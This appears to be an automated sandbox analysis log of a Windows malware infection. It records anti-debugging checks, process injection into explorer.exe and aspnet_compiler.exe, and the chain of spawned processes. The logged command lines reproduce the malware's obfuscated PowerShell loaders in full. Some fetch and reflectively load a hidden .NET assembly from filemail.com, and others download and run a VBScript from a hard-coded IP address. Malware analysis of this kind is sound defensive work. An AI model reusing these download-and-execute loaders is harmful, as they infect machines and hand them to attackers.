                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSystem information queried: CodeIntegrityInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402920 LdrLoadDll,13_2_00402920
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_030416C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,20_2_030416C7
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02DC9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,17_2_02DC9247
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D61011 GetProcessHeap,RtlFreeHeap,17_2_02D61011
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\djvbaaeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeFile created: djvbaae.14.drJump to dropped file
                Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 46.173.214.24 80
                Source: Yara matchFile source: amsi32_5568.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread created: C:\Windows\explorer.exe EIP: 3441960
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 4928 base: 9D79C0 value: 90
                Source: C:\Windows\explorer.exeMemory written: PID: 796 base: 7FF72B812D10 value: 90
                Source: C:\Windows\explorer.exeMemory written: PID: 7052 base: 9D79C0 value: 90
                Source: C:\Windows\explorer.exeMemory written: PID: 7100 base: 9D79C0 value: 90
                Source: C:\Windows\explorer.exeMemory written: PID: 3484 base: 7FF72B812D10 value: 90
                Source: C:\Windows\explorer.exeMemory written: PID: 692 base: 9D79C0 value: 90
                Source: C:\Windows\explorer.exeMemory written: PID: 5432 base: 7FF72B812D10 value: 90
                Source: C:\Windows\explorer.exeMemory written: PID: 3588 base: 9D79C0 value: 90
                Source: C:\Windows\explorer.exeMemory written: PID: 2164 base: 7FF72B812D10 value: 90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: BB7008Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9D79C0
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9D79C0
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9D79C0
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9D79C0
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9D79C0
                Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe27_2_02D51016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe27_2_02D510A5
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES60DC.tmp" "c:\Users\user\AppData\Local\Temp\tnaq44gy\CSCA55E465C63A145CC9DC9276A53775DB5.TMP"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfhvy0vsn21mywmgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrelxrzcgugicagicagicagicagicagicagicagicagicagicagicatbwvnymvszevgaw5pvelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxnt04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbkbkhytg8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagamxxtwh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiewsdwludcagicagicagicagicagicagicagicagicagicagicagifved1jcwentleludfb0ciagicagicagicagicagicagicagicagicagicagicagihffs3zxktsnicagicagicagicagicagicagicagicagicagicagicaglw5bbuugicagicagicagicagicagicagicagicagicagicagicaizhpuayigicagicagicagicagicagicagicagicagicagicagicattmfnzvnqqunficagicagicagicagicagicagicagicagicagicagicagbhhzqnrttvb2icagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicryb2nfujdtzmfjojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzgvntmvc2vlbxlizxn0bmv0d29ya3doawnoz2l2zwjlc3r0agluz3nlbnrpcmvsawzld2l0ag1llnrjriisiirftny6qvbqrefuqvxzzwvtewjlc3ruzxr3b3jrd2hpy2hnaxzlymvzdhroaw5nc2vudglyzwxpzmv3axrolnziuyismcwwkttzvefydc1zbevfucgzkttjrvggicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxhnlzw15ymvzdg5ldhdvcmt3agljagdpdmvizxn0dghpbmdzzw50axjlbglmzxdpdggudmjtig=='+[char]0x22+'))')))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdzzvlpbwfnzvunkydybca9ifb1swh0jysndhbzjysnoicrjy8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbccrj2uvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3qnkydhcm5usunmrmhtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngyguhvjo3nlwxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xjysnzwjdbgllbnq7c2vzaw1hz2vcexrlcya9ihnlwxdlyknsawvujysndc5eb3dubg9hzerhdgeoc2vzaw1hz2vvcmwpo3nlwwltywcnkydlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkhnlwwltywdlqnl0jysnzxmpo3nlwxn0yxj0rmxhzya9ifb1stw8qkftrty0xycrj1nuqvjupj5qduk7c2vzzw5kricrj2xhzya9ifb1sscrjzw8qkftrty0x0vord4+uhvjo3nlwxn0yxj0sw5kzxggpsbzzvlpbwfnzvrlehqusw5kzxhpzignkydzzvlzdgfydezsywcpo3nlwwvuzccrj0luzgv4id0gc2vzaw1hz2vuzxh0lkluzgv4t2yoc2vzzw5krmxhzyk7cycrj2vzc3rhcnrjbmrlecatz2ugmcatyw5kihnlwwvuzeluzgv4ic1ndcbzzvlzdgfydeluzgv4o3mnkydlwxn0yxj0sw5kzxggkz0gc2vzc3rhcnrgbgfnlkxlbmd0adtzzvliyxnlnjrmzw5ndgggpsbzzvllbmrjbmrlecatihnlwxn0yxj0sw5kzxg7c2vzymfzzty0q29tbwfuzca9jysnihnljysnwwltywcnkydlvccrj2v4dc5tdwjzdhjpbmcoc2vzc3rhcnrjbmrlecwnkycgc2vzymfzzty0tgvuz3rokttzzvliyxnlnjrszxzlcnnlzca9ic1qb2luichzzvliyxnlnjrdb21tyw5kjysnllrvq2hhckfycmf5kckgmnbpiezvckunkydhy2gtt2jqzwn0ihsgc2vzxyb9kvstms4ulshzzvknkydiyxnlnjrdb21tyw5klkxlbmd0acldo3nlwscrj2nvbw1hbmrcexrlcya9ifttexn0zw0uqycrj29udmvydf06okzyb21cyxnlnjrtdhjpbmcojysnc2vzymfzzty0umv2zxjzzwqpo3nlwscrj2xvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzsjysnzwn0aw9ulkfzc2vtymx5xscrjzo6tg9hzchzzvljb21tyw5kqnl0zxmpo3nlwxzhau1ldghvzca9ifsnkydkbmxpyi5jty5ib21lxs5hzxrnzxrob2qouhvjvkfjuhvjkttzzvl2ywlnzscrj3rob2qusw52bycrj2tlkhnlww51bgwsieaouhvjdhh0llrhukzgulcvmzuvodcxljq0lji3ms43mdevlycrjzpwdhrouhvjlcbqdulkzxnhdgl2ywrvuhvjlcbqdulkjysnzxnhdgl2ywrvuhvjlcbqdscrj0lkzxnhdgl2ywrvuhvjlcbqdulhc3buzxrfy29tcglsjysnzxjqduksifb1swrlc2f0axzhzg9qduksiccrj1b1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkbycrj1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1swrlc2f0axzhzg9qduksuhvjzgvzyxrpdmfkb1b1ssxqdulkzxnhdgl2ywrvuhvjlfb1stfqduksuhvjzgvzyxrpdmfkb1b1sskpoycplnjfugxhq0uoj1b1sscsw1n0cklur11bq0hbul0zoskuckvqbgfdrsgnmnbpjywnfccplnjfugxhq0uoj3nlwscsjyqnkxwgliaokgdwiccqtwrykicplm5bbuvbmywxmswyxs1qt0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('seyimageu'+'rl = puiht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvst'+'grnticffhmtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f pui;seywebclient = new-object system.net.w'+'ebclient;seyimagebytes = seywebclien'+'t.downloaddata(seyimageurl);seyimag'+'etext = [system.text.encoding]::utf8.getstring(seyimagebyt'+'es);seystartflag = pui<<base64_'+'start>>pui;seyendf'+'lag = pui'+'<<base64_end>>pui;seystartindex = seyimagetext.indexof('+'seystartflag);seyend'+'index = seyimagetext.indexof(seyendflag);s'+'eystartindex -ge 0 -and seyendindex -gt seystartindex;s'+'eystartindex += seystartflag.length;seybase64length = seyendindex - seystartindex;seybase64command ='+' se'+'yimag'+'et'+'ext.substring(seystartindex,'+' seybase64length);seybase64reversed = -join (seybase64command'+'.tochararray() 2po fore'+'ach-object { sey_ })[-1..-(sey'+'base64command.length)];sey'+'commandbytes = [system.c'+'onvert]::frombase64string('+'seybase64reversed);sey'+'loadedassembly = [system.refl'+'ection.assembly]'+'::load(seycommandbytes);seyvaimethod = ['+'dnlib.io.home].getmethod(puivaipui);seyvaime'+'thod.invo'+'ke(seynull, @(puitxt.tgrffrw/35/871.44.271.701//'+':ptthpui, puidesativadopui, puid'+'esativadopui, pu'+'idesativadopui, puiaspnet_compil'+'erpui, puidesativadopui, '+'puidesativadopui,puidesativado'+'pui,puidesativadopui,puidesativadopui,puidesativadopui,puidesativadopui,pui1pui,puidesativadopui));').replace('pui',[string][char]39).replace('2po','|').replace('sey','$')| . ((gv '*mdr*').name[3,11,2]-join'')"
